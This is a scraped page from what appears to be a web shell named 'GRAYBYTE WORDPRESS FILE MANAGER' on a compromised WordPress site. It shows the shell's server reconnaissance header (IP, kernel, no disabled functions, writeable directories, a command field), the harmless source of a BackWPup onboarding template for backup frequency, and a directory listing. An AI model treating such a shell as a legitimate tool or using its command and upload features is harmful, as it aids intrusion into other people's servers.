GRAYBYTE WORDPRESS FILE MANAGER6433

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/backwpup/components/onboarding/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/backwpup/components/onboarding//step2.php
<?php
use BackWPup\Utils\BackWPupHelpers;

/**
 * @var int $first_job_id ID of the first job we are retrieving the frequency settings for.
 * @var int $second_job_id ID of the second job we are retrieving the frequency settings for.
 */

BackWPupHelpers::component("heading", [
  "level" => 2,
  "title" => __("When to automatically create your backup?", 'backwpup') . "<sup>*</sup>",
]);
?>

<div class="flex-auto">
  <div class="flex items-center gap-4 border-b border-grey-200 py-6 test-files">
    <div class="shrink-0">
      <?php BackWPupHelpers::component("icon", ["name" => "file-alt", "size" => "xl"]); ?>
    </div>
    <div class="flex-auto">
      <?php
      BackWPupHelpers::component("heading-desc", [
        "title" => __("Files backup scheduled", 'backwpup'),
      ]);
      ?>
      <p>
        <?php
	        BackWPupHelpers::component("form/button", [
		        "type" => "link",
		        "label" => __("Advanced settings", 'backwpup'),
		        "trigger" => "load-and-open-sidebar",
		        "display" => 'frequency',
		        "data"    => [ 'job-id' => $first_job_id, 'block-type' => 'children', 'block-name' => 'sidebar/frequency',  ],
	        ]);
        ?>
      </p>
    </div>

    <?php
    BackWPupHelpers::component("form/select", [
      "name" => "job_".$first_job_id."_frequency",
        "label" => __("Frequency", 'backwpup'),
      "class" => "onboarding-files-frequency",
      "value" => "monthly",
      "trigger" => "onboarding-files-frequency",
      "options" => [
        'hourly' => __( 'Hourly', 'backwpup' ),
        "daily" => __("Daily", 'backwpup'),
        "weekly" => __("Weekly", 'backwpup'),
        "monthly" => __("Monthly", 'backwpup'),
      ],
    ]);
    ?>
  </div>

  <div class="flex items-center gap-4 py-6">
    <div class="shrink-0">
      <?php BackWPupHelpers::component("icon", ["name" => "database", "size" => "xl"]); ?>
    </div>
    <div class="flex-auto">
      <?php
      BackWPupHelpers::component("heading-desc", [
        "title" => __("Database backup scheduled", 'backwpup'),
      ]);
      ?>
      <p>
        <?php
        BackWPupHelpers::component("form/button", [
	        "type" => "link",
	        "label" => __("Advanced settings", 'backwpup'),
	        "trigger" => "load-and-open-sidebar",
	        "display" => 'frequency',
	        "data"    => [ 'job-id' => $second_job_id, 'block-type' => 'children', 'block-name' => 'sidebar/frequency',  ],
        ]);
        ?>
      </p>
    </div>
    <?php
    BackWPupHelpers::component("form/select", [
	    "name" => "job_".$second_job_id."_frequency",
      "label" => __("Frequency", 'backwpup'),
      "value" => "monthly",
      "class" => "onboarding-database-frequency",
      "trigger" => "onboarding-database-frequency",
      "options" => [
        'hourly' => __( 'Hourly', 'backwpup' ),
        "daily" => __("Daily", 'backwpup'),
        "weekly" => __("Weekly", 'backwpup'),
        "monthly" => __("Monthly", 'backwpup'),
      ],
    ]);
    ?>
  </div>
</div>

<div>
  <p class="text-xs"><sup>*</sup><?php _e("The first backup will be created right after saving the options", 'backwpup'); ?></p>
</div>

<footer class="mt-6 flex justify-between items-center gap-4">
  <?php
  BackWPupHelpers::component("form/button", [
    "type" => "secondary",
    "label" => __("Back to What", 'backwpup'),
    "icon_name" => "arrow-left",
    "icon_position" => "before",
    "trigger" => "onboarding-step-1",
  ]);
  ?>

  <?php
  BackWPupHelpers::component("form/button", [
    "type" => "primary",
    "label" => __("Save & Continue", 'backwpup'),
    "icon_name" => "arrow-right",
    "icon_position" => "after",
    "trigger" => "onboarding-step-3",
    'button_type' => 'button',
  ]);
  ?>
</footer>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:37
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:37
giriqfky / giriqfky
0644
step1.php
0.812 KB
April 23 2025 14:14:02
giriqfky / giriqfky
0644
step2.php
3.669 KB
April 23 2025 14:14:02
giriqfky / giriqfky
0644
step3.php
2.145 KB
April 07 2025 18:31:08
giriqfky / giriqfky
0644
storage-item.php
2.161 KB
May 20 2025 11:41:24
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF